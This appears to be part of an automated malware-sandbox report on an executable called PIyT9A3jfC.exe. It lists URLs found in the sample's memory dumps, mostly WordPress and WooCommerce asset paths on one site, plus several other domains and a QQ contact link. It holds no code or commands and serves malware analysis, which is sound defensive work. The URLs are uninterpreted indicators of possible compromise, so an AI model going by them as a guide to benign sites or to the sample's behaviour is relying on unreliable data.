                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.9.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.8.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.8.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-theme-child/style.css?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=1687814006
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1687814005
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-410.css?ver=1687814006
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-501.css?ver=1687814006
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5e1906bec96d1e3fc9ce
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5e1906bec96d1e3fc9ce5c4f
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5e1906bec96d1e3fc9ce5c4f1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/underscore.min.js?ver=1.13.4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=5e1906bec96d1e3fc9ce5c4f198cbceb
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://webeasy.com.hk
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://wpa.qq.com/msgrd?v=3&uin=2938350997&site=qq&menu=yes
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.railbook.net/?subid1=20230728-0544-185e-b7f5-be2d330da0b2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.pupi.cz/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.805219549.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/hH
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.762justice.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.abart.pl/
